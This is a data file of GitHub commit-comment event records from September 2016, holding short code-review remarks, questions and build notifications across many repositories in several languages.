{"id":"4635354316","type":"CommitCommentEvent","actor":{"login":"bsclifton"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19219584,"position":null,"line":null,"path":null,"commit_id":"3fff2f3685b5a9c0e791e844dbf83f7af3943f75","created_at":"2016-09-29T06:46:02Z","updated_at":"2016-09-29T06:46:02Z","body":"++"}},"created_at":"2016-09-29T06:46:02Z"}
{"id":"4635355180","type":"CommitCommentEvent","actor":{"login":"Asuan"},"repo":{"name":"Stive-11/iptables"},"payload":{"comment":{"id":19219586,"position":4,"line":16,"path":"templates/controllers/SendDataCtrl.js","commit_id":"2bd8200d50776c1df3cfb19c0e03471d39f00207","created_at":"2016-09-29T06:46:19Z","updated_at":"2016-09-29T06:46:19Z","body":"Там не коментрарий последнее а текст рула :) comment -- > rule"}},"created_at":"2016-09-29T06:46:19Z"}
{"id":"4635360311","type":"CommitCommentEvent","actor":{"login":"roblav96"},"repo":{"name":"NativeScript/android-runtime"},"payload":{"comment":{"id":19219595,"position":null,"line":null,"path":null,"commit_id":"3d762825b02bf8555bb9b1c36d0bd574bc187238","created_at":"2016-09-29T06:47:51Z","updated_at":"2016-09-29T06:47:51Z","body":"@Plamen5kov Ah, gotcha. I see the word `generator` and got a little excited. lol Thank you!"}},"created_at":"2016-09-29T06:47:51Z"}
{"id":"4635365715","type":"CommitCommentEvent","actor":{"login":"becvert"},"repo":{"name":"becvert/cordova-plugin-zeroconf"},"payload":{"comment":{"id":19219609,"position":null,"line":null,"path":null,"commit_id":"52136071a77cfaec4430bfa531a9d78a362340d3","created_at":"2016-09-29T06:49:26Z","updated_at":"2016-09-29T06:49:26Z","body":"OK. I'm not very familiar with the release process on github yet. I'll have a look.\r\n\r\nAnd I'll make sure that the [Language Version setting](https://github.com/akofman/cordova-plugin-add-swift-support/pull/16) is fixed over there.\r\n\r\nJust set the version to `3.0` manually for now I guess.\r\n"}},"created_at":"2016-09-29T06:49:26Z"}
{"id":"4635371164","type":"CommitCommentEvent","actor":{"login":"changfan"},"repo":{"name":"changfan/require"},"payload":{"comment":{"id":19219624,"position":null,"line":null,"path":null,"commit_id":"09d33ba65e15c6b346d88be0e4e1717acd6e2db3","created_at":"2016-09-29T06:50:59Z","updated_at":"2016-09-29T06:50:59Z","body":"tb5tbtb"}},"created_at":"2016-09-29T06:50:59Z"}
{"id":"4635371452","type":"CommitCommentEvent","actor":{"login":"willpatera"},"repo":{"name":"CherryChu/pupil"},"payload":{"comment":{"id":19219626,"position":64,"line":94,"path":"pupil_src/player/raw_data_exporter.py","commit_id":"56f15c719c3e6d7c6b0dc25f9207f1e9d2b47c1f","created_at":"2016-09-29T06:51:03Z","updated_at":"2016-09-29T06:51:03Z","body":"`csv_writer` is the variable name for the csv writer `csv.writer` and has no attribute in its class `sort` - please see documents on [csv](https://docs.python.org/2/library/csv.html) and [sort](https://wiki.python.org/moin/HowTo/Sorting)"}},"created_at":"2016-09-29T06:51:03Z"}
{"id":"4635374965","type":"CommitCommentEvent","actor":{"login":"simahawk"},"repo":{"name":"guewen/connector-prestashop"},"payload":{"comment":{"id":19219633,"position":null,"line":null,"path":null,"commit_id":"db9690f0390f9a34ed54fffcbb261ddb964195f7","created_at":"2016-09-29T06:52:07Z","updated_at":"2016-09-29T06:52:07Z","body":"ah, sorry didn't think about that. This fix is for latest 1.6. So, I guess we need to handle it with a different backend version?"}},"created_at":"2016-09-29T06:52:07Z"}
{"id":"4635377832","type":"CommitCommentEvent","actor":{"login":"willpatera"},"repo":{"name":"CherryChu/pupil"},"payload":{"comment":{"id":19219640,"position":64,"line":94,"path":"pupil_src/player/raw_data_exporter.py","commit_id":"56f15c719c3e6d7c6b0dc25f9207f1e9d2b47c1f","created_at":"2016-09-29T06:52:58Z","updated_at":"2016-09-29T06:52:58Z","body":"you need to sort the data prior to writing it into a row of the csv."}},"created_at":"2016-09-29T06:52:58Z"}
{"id":"4635378265","type":"CommitCommentEvent","actor":{"login":"lubo"},"repo":{"name":"Frozen-Developers/android-cache-cleaner"},"payload":{"comment":{"id":19219641,"position":null,"line":null,"path":null,"commit_id":"1e3b14a24a97af34397be137f5a87a6add5148a0","created_at":"2016-09-29T06:53:05Z","updated_at":"2016-09-29T06:53:05Z","body":"No, it is not possible."}},"created_at":"2016-09-29T06:53:05Z"}
{"id":"4635380007","type":"CommitCommentEvent","actor":{"login":"fwolf"},"repo":{"name":"jerrybendy/phpstorm-webstorm-skills"},"payload":{"comment":{"id":19219645,"position":40,"line":24,"path":"docs/002.keyboard-shortcuts-you-cannot-miss.md","commit_id":"0df6b7a14aea310a71efabcc6ad7d660c27412f0","created_at":"2016-09-29T06:53:35Z","updated_at":"2016-09-29T06:53:35Z","body":"是啊，中文字等宽在mac和linux的编辑器下似乎都比较成问题，只能忍了。"}},"created_at":"2016-09-29T06:53:35Z"}
{"id":"4635381222","type":"CommitCommentEvent","actor":{"login":"fwolf"},"repo":{"name":"jerrybendy/phpstorm-webstorm-skills"},"payload":{"comment":{"id":19219648,"position":40,"line":24,"path":"docs/002.keyboard-shortcuts-you-cannot-miss.md","commit_id":"0df6b7a14aea310a71efabcc6ad7d660c27412f0","created_at":"2016-09-29T06:53:56Z","updated_at":"2016-09-29T06:53:56Z","body":"是啊，中文字等宽在mac和linux的编辑器下似乎都比较成问题，只能忍了。"}},"created_at":"2016-09-29T06:53:56Z"}
{"id":"4635385961","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19219653,"position":4,"line":63,"path":"common/src/main/java/com/emc/mongoose/common/net/ServiceUtil.java","commit_id":"38c05e5a77a35e6e1b31a3042b74cc601812dcb9","created_at":"2016-09-29T06:55:23Z","updated_at":"2016-09-29T06:55:23Z","body":"should be a constant"}},"created_at":"2016-09-29T06:55:23Z"}
{"id":"4635386217","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Vlako/TriangleTask"},"payload":{"comment":{"id":19219654,"position":25,"line":25,"path":"TriangleTask/TriangleTests/TriangleTest.cs","commit_id":"4e64b04c7e02834a496437aafb66bd57b211ae5a","created_at":"2016-09-29T06:55:27Z","updated_at":"2016-09-29T06:55:27Z","body":"Лучше придерживаться http://c2.com/cgi/wiki?ArrangeActAssert\r\nНе всегда конечно, но в большинстве случаев это оправданно. Здесь тоже вместо одной строки лучше сделать хотя бы две)"}},"created_at":"2016-09-29T06:55:27Z"}
{"id":"4635387730","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19219659,"position":18,"line":73,"path":"common/src/main/java/com/emc/mongoose/common/net/ServiceUtil.java","commit_id":"38c05e5a77a35e6e1b31a3042b74cc601812dcb9","created_at":"2016-09-29T06:55:53Z","updated_at":"2016-09-29T06:55:53Z","body":"unnecessary line break"}},"created_at":"2016-09-29T06:55:53Z"}
{"id":"4635388273","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19219661,"position":12,"line":71,"path":"common/src/main/java/com/emc/mongoose/common/net/ServiceUtil.java","commit_id":"38c05e5a77a35e6e1b31a3042b74cc601812dcb9","created_at":"2016-09-29T06:56:03Z","updated_at":"2016-09-29T06:56:03Z","body":"throwing list is too big"}},"created_at":"2016-09-29T06:56:03Z"}
{"id":"4635389481","type":"CommitCommentEvent","actor":{"login":"dooma"},"repo":{"name":"Courseware/courseware.github.com"},"payload":{"comment":{"id":19219665,"position":null,"line":null,"path":null,"commit_id":"28e18b4939296bba05abebd93c4113586b1ccc7e","created_at":"2016-09-29T06:56:24Z","updated_at":"2016-09-29T06:56:24Z","body":"@stas Could you update my Twitter nickname in the story( if it's possible)? Thanks!"}},"created_at":"2016-09-29T06:56:24Z"}
{"id":"4635390678","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19219667,"position":27,"line":106,"path":"common/src/main/java/com/emc/mongoose/common/net/ServiceUtil.java","commit_id":"38c05e5a77a35e6e1b31a3042b74cc601812dcb9","created_at":"2016-09-29T06:56:45Z","updated_at":"2016-09-29T06:56:45Z","body":"throwing list is too long"}},"created_at":"2016-09-29T06:56:45Z"}
{"id":"4635391924","type":"CommitCommentEvent","actor":{"login":"jbrendel"},"repo":{"name":"romana/romana"},"payload":{"comment":{"id":19219670,"position":5,"line":94,"path":"romana-install/roles/romana/install-master/templates/config/romana.conf.yml","commit_id":"70c5b50557ea70654717f337451bbc197ac0a5d1","created_at":"2016-09-29T06:57:05Z","updated_at":"2016-09-29T06:57:05Z","body":"That would be clean, since the whole kubernetesListener portion isn't really needed anyway in the case of Devstack. However, it would then not install (and not cause an error) if the variable is accidentally not defined for a Kubernetes installation.\r\n\r\nMaybe, instead of checking if \"romana_segment_label_name\" is defined, we should instead have a check here to see if we do a Kubernetes install. That way, we enter this section here (for a k8s install) and will properly fail if the variable is not defined.\r\n\r\nSo, the check should probably be:\r\n\r\n    {% if stack_type == \"kubernetes\" %}\r\n    ...\r\n    {% endif %}\r\n"}},"created_at":"2016-09-29T06:57:05Z"}
{"id":"4635393081","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19219672,"position":45,"line":45,"path":"monitor/src/main/java/com/emc/mongoose/monitor/BasicLoadMonitorSvc.java","commit_id":"38c05e5a77a35e6e1b31a3042b74cc601812dcb9","created_at":"2016-09-29T06:57:27Z","updated_at":"2016-09-29T06:57:27Z","body":"define is a wrong word here. should be determine"}},"created_at":"2016-09-29T06:57:27Z"}
{"id":"4635393135","type":"CommitCommentEvent","actor":{"login":"jaels"},"repo":{"name":"jaels/node.js"},"payload":{"comment":{"id":19219673,"position":14,"line":14,"path":"http.js","commit_id":"8111aec616ab9fdd4d2a3b13dc4bb230a6da4dce","created_at":"2016-09-29T06:57:29Z","updated_at":"2016-09-29T06:57:29Z","body":"I'll put a reminder on my phone to change it when time comes"}},"created_at":"2016-09-29T06:57:29Z"}
{"id":"4635393829","type":"CommitCommentEvent","actor":{"login":"ifdog"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19219674,"position":null,"line":null,"path":null,"commit_id":"e710914af611aa42ba5454c22a71ff8b7bfdda02","created_at":"2016-09-29T06:57:40Z","updated_at":"2016-09-29T06:57:40Z","body":"而我用的是HD4000...\r\n我先仔细研究了最上面三行英文，才发现和我没什么关系 - -！\r\n以及，今年基本不出差了，出不动了..."}},"created_at":"2016-09-29T06:57:40Z"}
{"id":"4635394227","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19219675,"position":39,"line":39,"path":"monitor/src/main/java/com/emc/mongoose/monitor/BasicLoadMonitorSvc.java","commit_id":"38c05e5a77a35e6e1b31a3042b74cc601812dcb9","created_at":"2016-09-29T06:57:46Z","updated_at":"2016-09-29T06:57:46Z","body":"invalid formatting"}},"created_at":"2016-09-29T06:57:46Z"}
{"id":"4635394547","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Vlako/TriangleTask"},"payload":{"comment":{"id":19219676,"position":23,"line":23,"path":"TriangleTask/TriangleTests/TriangleTest.cs","commit_id":"4e64b04c7e02834a496437aafb66bd57b211ae5a","created_at":"2016-09-29T06:57:52Z","updated_at":"2016-09-29T06:57:52Z","body":"Название должно описывать то, что тестируем (саму суть), а не перечисление параметров"}},"created_at":"2016-09-29T06:57:52Z"}
{"id":"4635394695","type":"CommitCommentEvent","actor":{"login":"DMIAOCHEN"},"repo":{"name":"DMIAOCHEN/eWorldWebApplication"},"payload":{"comment":{"id":19219677,"position":null,"line":null,"path":null,"commit_id":"3487a913fb36c13dc1e922ac6d93c200d0524aee","created_at":"2016-09-29T06:57:55Z","updated_at":"2016-09-29T06:57:55Z","body":"#3 "}},"created_at":"2016-09-29T06:57:55Z"}
{"id":"4635395655","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19219679,"position":88,"line":108,"path":"monitor/src/main/java/com/emc/mongoose/monitor/Main.java","commit_id":"38c05e5a77a35e6e1b31a3042b74cc601812dcb9","created_at":"2016-09-29T06:58:11Z","updated_at":"2016-09-29T06:58:11Z","body":"invalid fromatting"}},"created_at":"2016-09-29T06:58:11Z"}
{"id":"4635398229","type":"CommitCommentEvent","actor":{"login":"DMIAOCHEN"},"repo":{"name":"DMIAOCHEN/eWorldWebApplication"},"payload":{"comment":{"id":19219684,"position":null,"line":null,"path":null,"commit_id":"770678f1e1bbc603bf8470fa2a81fec57677e494","created_at":"2016-09-29T06:58:55Z","updated_at":"2016-09-29T06:58:55Z","body":"#3 "}},"created_at":"2016-09-29T06:58:55Z"}
{"id":"4635399622","type":"CommitCommentEvent","actor":{"login":"DMIAOCHEN"},"repo":{"name":"DMIAOCHEN/eWorldWebApplication"},"payload":{"comment":{"id":19219685,"position":null,"line":null,"path":null,"commit_id":"44f29ee38fd496c0d26ddd69b86540f8cfb5eb5e","created_at":"2016-09-29T06:59:19Z","updated_at":"2016-09-29T06:59:19Z","body":"#3 "}},"created_at":"2016-09-29T06:59:19Z"}
{"id":"4635400055","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19219686,"position":16,"line":16,"path":"storage/driver-service/src/main/java/com/emc/mongoose/storage/driver/service/Main.java","commit_id":"38c05e5a77a35e6e1b31a3042b74cc601812dcb9","created_at":"2016-09-29T06:59:26Z","updated_at":"2016-09-29T06:59:26Z","body":"shouldn't print the stacktrace for the InterruptedException\r\nisn't it clear?"}},"created_at":"2016-09-29T06:59:26Z"}
{"id":"4635401221","type":"CommitCommentEvent","actor":{"login":"DMIAOCHEN"},"repo":{"name":"DMIAOCHEN/eWorldWebApplication"},"payload":{"comment":{"id":19219688,"position":null,"line":null,"path":null,"commit_id":"a815ee03563d1dc122ecbd84d3f4a066061d6e99","created_at":"2016-09-29T06:59:47Z","updated_at":"2016-09-29T06:59:47Z","body":"#3 "}},"created_at":"2016-09-29T06:59:47Z"}
{"id":"4635403236","type":"CommitCommentEvent","actor":{"login":"DMIAOCHEN"},"repo":{"name":"DMIAOCHEN/eWorldWebApplication"},"payload":{"comment":{"id":19219695,"position":null,"line":null,"path":null,"commit_id":"9bd907f356858efc267fbc6443c1e5d56d221f8b","created_at":"2016-09-29T07:00:19Z","updated_at":"2016-09-29T07:00:19Z","body":"#3 "}},"created_at":"2016-09-29T07:00:19Z"}
{"id":"4635405923","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19219712,"position":92,"line":92,"path":"storage/driver-service/src/main/java/com/emc/mongoose/storage/driver/service/BasicStorageDriverFactorySvc.java","commit_id":"38c05e5a77a35e6e1b31a3042b74cc601812dcb9","created_at":"2016-09-29T07:01:02Z","updated_at":"2016-09-29T07:01:02Z","body":"WTF?"}},"created_at":"2016-09-29T07:01:02Z"}
{"id":"4635406041","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimPropertySets"},"payload":{"comment":{"id":19219713,"position":null,"line":null,"path":null,"commit_id":"40408f4cf65b7e332f4668cf94917f606454555a","created_at":"2016-09-29T07:01:04Z","updated_at":"2016-09-29T07:01:04Z","body":"TeamCity Xbim :: Xbim Property Sets :: Xbim Property Sets [Build 12](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1262&buildTypeId=Xbim_XbimPropertySets_XbimPropertySets) is now running\n"}},"created_at":"2016-09-29T07:01:04Z"}
{"id":"4635406701","type":"CommitCommentEvent","actor":{"login":"kazeburo"},"repo":{"name":"kazeburo/Cookie-Baker"},"payload":{"comment":{"id":19219715,"position":5,"line":90,"path":"lib/Cookie/Baker.pm","commit_id":"b923892b5a4d128fd429239bc612f76d0d37fd78","created_at":"2016-09-29T07:01:14Z","updated_at":"2016-09-29T07:01:14Z","body":"no reason. just copied from Plack::Request.\r\n"}},"created_at":"2016-09-29T07:01:14Z"}
{"id":"4635408404","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimPropertySets"},"payload":{"comment":{"id":19219716,"position":null,"line":null,"path":null,"commit_id":"40408f4cf65b7e332f4668cf94917f606454555a","created_at":"2016-09-29T07:01:44Z","updated_at":"2016-09-29T07:01:44Z","body":"TeamCity Xbim :: Xbim Property Sets :: Xbim Property Sets [Build 12](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1262&buildTypeId=Xbim_XbimPropertySets_XbimPropertySets) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:41"}},"created_at":"2016-09-29T07:01:44Z"}
{"id":"4635413197","type":"CommitCommentEvent","actor":{"login":"hungpq14"},"repo":{"name":"Frozen-Developers/android-cache-cleaner"},"payload":{"comment":{"id":19219727,"position":null,"line":null,"path":null,"commit_id":"1e3b14a24a97af34397be137f5a87a6add5148a0","created_at":"2016-09-29T07:03:10Z","updated_at":"2016-09-29T07:03:10Z","body":"one more question. it seem not concern but i am trying to clean advert junk in device (Log files, Temp files, Empty folder...) could you suggest me how to do or suggest some documents. Anyway tkanks for your answer."}},"created_at":"2016-09-29T07:03:10Z"}
{"id":"4635415781","type":"CommitCommentEvent","actor":{"login":"kazeburo"},"repo":{"name":"kazeburo/Cookie-Baker"},"payload":{"comment":{"id":19219729,"position":5,"line":90,"path":"lib/Cookie/Baker.pm","commit_id":"b923892b5a4d128fd429239bc612f76d0d37fd78","created_at":"2016-09-29T07:03:54Z","updated_at":"2016-09-29T07:03:54Z","body":"fixed https://github.com/kazeburo/Cookie-Baker/commit/127544a6e3fa09bc0e59fecd469640a787ff15d5"}},"created_at":"2016-09-29T07:03:54Z"}
{"id":"4635416657","type":"CommitCommentEvent","actor":{"login":"ltj5201413"},"repo":{"name":"ltj5201413/test"},"payload":{"comment":{"id":19219730,"position":null,"line":null,"path":null,"commit_id":"70edda603171b94a12e74e7a5aa675fadc002cc4","created_at":"2016-09-29T07:04:09Z","updated_at":"2016-09-29T07:04:09Z","body":"阿松的"}},"created_at":"2016-09-29T07:04:09Z"}
{"id":"4635418845","type":"CommitCommentEvent","actor":{"login":"ltj5201413"},"repo":{"name":"ltj5201413/test"},"payload":{"comment":{"id":19219732,"position":1,"line":1,"path":"test1","commit_id":"70edda603171b94a12e74e7a5aa675fadc002cc4","created_at":"2016-09-29T07:04:44Z","updated_at":"2016-09-29T07:04:44Z","body":"word"}},"created_at":"2016-09-29T07:04:44Z"}
{"id":"4635418917","type":"CommitCommentEvent","actor":{"login":"eunjuK"},"repo":{"name":"eunjuK/git-test"},"payload":{"comment":{"id":19219733,"position":2,"line":2,"path":"README.md","commit_id":"1f57d0eb6109c3ff9e759195bda5118cbe07f2f2","created_at":"2016-09-29T07:04:45Z","updated_at":"2016-09-29T07:04:45Z","body":"dfffsdfsfs"}},"created_at":"2016-09-29T07:04:45Z"}
{"id":"4635422552","type":"CommitCommentEvent","actor":{"login":"preethi07"},"repo":{"name":"preethi07/testgithub1"},"payload":{"comment":{"id":19219737,"position":null,"line":null,"path":null,"commit_id":"dbf7c2905a9baeaf3a1502486e13f9e8ce76a1c2","created_at":"2016-09-29T07:05:46Z","updated_at":"2016-09-29T07:05:46Z","body":"rterter"}},"created_at":"2016-09-29T07:05:46Z"}
{"id":"4635427025","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19219759,"position":127,"line":126,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T07:06:59Z","updated_at":"2016-09-29T07:06:59Z","body":"А зачем ref?"}},"created_at":"2016-09-29T07:06:59Z"}
{"id":"4635428647","type":"CommitCommentEvent","actor":{"login":"nana88"},"repo":{"name":"aitjcize/QCamber"},"payload":{"comment":{"id":19219764,"position":null,"line":null,"path":null,"commit_id":"7aa7265c8708e66e5374a71389bace9d1b5a51c6","created_at":"2016-09-29T07:07:26Z","updated_at":"2016-09-29T07:07:26Z","body":"Could I ask, where is \"db.tab.h\"? I don't find it in these"}},"created_at":"2016-09-29T07:07:26Z"}
{"id":"4635428965","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19219766,"position":141,"line":140,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T07:07:31Z","updated_at":"2016-09-29T07:07:31Z","body":"А зачем area и присваивать и возвращать?"}},"created_at":"2016-09-29T07:07:31Z"}
{"id":"4635431169","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19219769,"position":121,"line":120,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T07:08:08Z","updated_at":"2016-09-29T07:08:08Z","body":"В одну строку прикольно, но не очень круто, в C# так не принято"}},"created_at":"2016-09-29T07:08:08Z"}
{"id":"4635432365","type":"CommitCommentEvent","actor":{"login":"stcherenkov"},"repo":{"name":"nonmanifold/svg-inline-loader"},"payload":{"comment":{"id":19219771,"position":null,"line":null,"path":null,"commit_id":"2ffa1c01cdc286015f219e881c70b557ea7f85c7","created_at":"2016-09-29T07:08:29Z","updated_at":"2016-09-29T07:08:29Z","body":"Looks ok to me"}},"created_at":"2016-09-29T07:08:29Z"}
{"id":"4635433460","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19219775,"position":60,"line":59,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T07:08:47Z","updated_at":"2016-09-29T07:08:47Z","body":"а чего всё ридонли, а это поле нет?"}},"created_at":"2016-09-29T07:08:47Z"}
{"id":"4635436929","type":"CommitCommentEvent","actor":{"login":"Zanser1609"},"repo":{"name":"kodinerds/repo"},"payload":{"comment":{"id":19219783,"position":4,"line":31,"path":"service.fussballpopup/resources/language/German/strings.xml","commit_id":"f4f64ef7ff9686be3d071831c9a0e4f7a22c7e23","created_at":"2016-09-29T07:09:47Z","updated_at":"2016-09-29T07:09:47Z","body":"Typo in Anazhl --> Anzahl"}},"created_at":"2016-09-29T07:09:47Z"}
{"id":"4635437182","type":"CommitCommentEvent","actor":{"login":"tkrokli"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19219787,"position":null,"line":null,"path":null,"commit_id":"e2c92dbc63a16f07bd46b2423cfe23fc22ab90b0","created_at":"2016-09-29T07:09:50Z","updated_at":"2016-09-29T07:09:50Z","body":"@Undergarun : Pull Requests should always use @CGUID / @OGUID in SQL files with creature/object spawns, because we users never know exactly when the PR will be merged (and free values could change before that)."}},"created_at":"2016-09-29T07:09:50Z"}
{"id":"4635437363","type":"CommitCommentEvent","actor":{"login":"Zanser1609"},"repo":{"name":"kodinerds/repo"},"payload":{"comment":{"id":19219789,"position":4,"line":28,"path":"service.fussballpopup/resources/language/English/strings.xml","commit_id":"f4f64ef7ff9686be3d071831c9a0e4f7a22c7e23","created_at":"2016-09-29T07:09:54Z","updated_at":"2016-09-29T07:09:54Z","body":"Typo in Anazhl --> Anzahl"}},"created_at":"2016-09-29T07:09:54Z"}
{"id":"4635440013","type":"CommitCommentEvent","actor":{"login":"GGICE"},"repo":{"name":"GGICE/ggice.github.io"},"payload":{"comment":{"id":19219792,"position":null,"line":null,"path":null,"commit_id":"e48da9eb9bdce146de8b314d2ade09d804ec705c","created_at":"2016-09-29T07:10:39Z","updated_at":"2016-09-29T07:10:39Z","body":"dfds"}},"created_at":"2016-09-29T07:10:39Z"}
{"id":"4635443514","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19219802,"position":25,"line":24,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T07:11:38Z","updated_at":"2016-09-29T07:11:38Z","body":"Отдельная структура под каждый случай, не сильно ли это усложняет понимание кода, на ваш взгляд?"}},"created_at":"2016-09-29T07:11:38Z"}
{"id":"4635444039","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19219804,"position":44,"line":44,"path":"storage/driver-http-s3/src/main/java/com/emc/mongoose/storage/driver/http/s3/HttpS3StorageDriverSvc.java","commit_id":"38c05e5a77a35e6e1b31a3042b74cc601812dcb9","created_at":"2016-09-29T07:11:47Z","updated_at":"2016-09-29T07:11:47Z","body":"invalid formatting"}},"created_at":"2016-09-29T07:11:47Z"}
{"id":"4635444872","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19219808,"position":47,"line":47,"path":"storage/driver-http-s3/src/main/java/com/emc/mongoose/storage/driver/http/s3/HttpS3StorageDriverSvc.java","commit_id":"38c05e5a77a35e6e1b31a3042b74cc601812dcb9","created_at":"2016-09-29T07:12:00Z","updated_at":"2016-09-29T07:12:00Z","body":"final"}},"created_at":"2016-09-29T07:12:00Z"}
{"id":"4635445291","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19219809,"position":49,"line":49,"path":"storage/driver-http-s3/src/main/java/com/emc/mongoose/storage/driver/http/s3/HttpS3StorageDriverSvc.java","commit_id":"38c05e5a77a35e6e1b31a3042b74cc601812dcb9","created_at":"2016-09-29T07:12:09Z","updated_at":"2016-09-29T07:12:09Z","body":"final"}},"created_at":"2016-09-29T07:12:09Z"}
{"id":"4635446401","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19219811,"position":36,"line":36,"path":"storage/driver-http-s3/src/main/java/com/emc/mongoose/storage/driver/http/s3/HttpS3StorageDriverSvc.java","commit_id":"38c05e5a77a35e6e1b31a3042b74cc601812dcb9","created_at":"2016-09-29T07:12:24Z","updated_at":"2016-09-29T07:12:24Z","body":"invalid formatting"}},"created_at":"2016-09-29T07:12:24Z"}
{"id":"4635446776","type":"CommitCommentEvent","actor":{"login":"honette"},"repo":{"name":"honette/dazscripts"},"payload":{"comment":{"id":19219813,"position":null,"line":null,"path":null,"commit_id":"bc0d8c4b8b657a1e7bab39d995d99d495fc45bb2","created_at":"2016-09-29T07:12:30Z","updated_at":"2016-09-29T07:12:30Z","body":"version 0.2.7"}},"created_at":"2016-09-29T07:12:30Z"}
{"id":"4635446905","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19219814,"position":48,"line":48,"path":"Triangle/Triangle.Tests/TriangleTest.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T07:12:33Z","updated_at":"2016-09-29T07:12:33Z","body":"Хорошо бы проверить, что ваши проверки валидности работают"}},"created_at":"2016-09-29T07:12:33Z"}
{"id":"4635447319","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19219817,"position":55,"line":55,"path":"storage/driver-http-s3/src/main/java/com/emc/mongoose/storage/driver/http/s3/HttpS3StorageDriverSvc.java","commit_id":"38c05e5a77a35e6e1b31a3042b74cc601812dcb9","created_at":"2016-09-29T07:12:39Z","updated_at":"2016-09-29T07:12:39Z","body":"final?"}},"created_at":"2016-09-29T07:12:39Z"}
{"id":"4635448685","type":"CommitCommentEvent","actor":{"login":"logamohan"},"repo":{"name":"logamohan/sample"},"payload":{"comment":{"id":19219820,"position":1,"line":1,"path":"helloworld","commit_id":"2dc83f92be1a6f211fb875372de9e7f20568f0d7","created_at":"2016-09-29T07:13:01Z","updated_at":"2016-09-29T07:13:01Z","body":"no include"}},"created_at":"2016-09-29T07:13:01Z"}
{"id":"4635453555","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19219835,"position":20,"line":20,"path":"storage/driver-service/src/main/java/com/emc/mongoose/storage/driver/service/HttpStorageDriverFactory.java","commit_id":"38c05e5a77a35e6e1b31a3042b74cc601812dcb9","created_at":"2016-09-29T07:14:19Z","updated_at":"2016-09-29T07:14:19Z","body":"move the Api enum into the HttpStorageDriver interface"}},"created_at":"2016-09-29T07:14:19Z"}
{"id":"4635454273","type":"CommitCommentEvent","actor":{"login":"manumanfred"},"repo":{"name":"google-aosp/platform_frameworks_native"},"payload":{"comment":{"id":19219836,"position":5,"line":794,"path":"libs/gui/SurfaceComposerClient.cpp","commit_id":"0b4cc05bcf2460d8ef84b4eeba1d8ee776cec51e","created_at":"2016-09-29T07:14:32Z","updated_at":"2016-09-29T07:14:32Z","body":"You are missing U. lol"}},"created_at":"2016-09-29T07:14:32Z"}
{"id":"4635454508","type":"CommitCommentEvent","actor":{"login":"gnodet"},"repo":{"name":"apache/karaf"},"payload":{"comment":{"id":19219838,"position":4,"line":35,"path":"assemblies/features/base/src/main/resources/resources/etc/org.ops4j.pax.logging.cfg","commit_id":"856ca3bd1f14d768275827328996783b812b100b","created_at":"2016-09-29T07:14:35Z","updated_at":"2016-09-29T07:14:35Z","body":"That doesn't work.\r\nThe syntax for log4j2 has changed.\r\nI'll fix it."}},"created_at":"2016-09-29T07:14:35Z"}
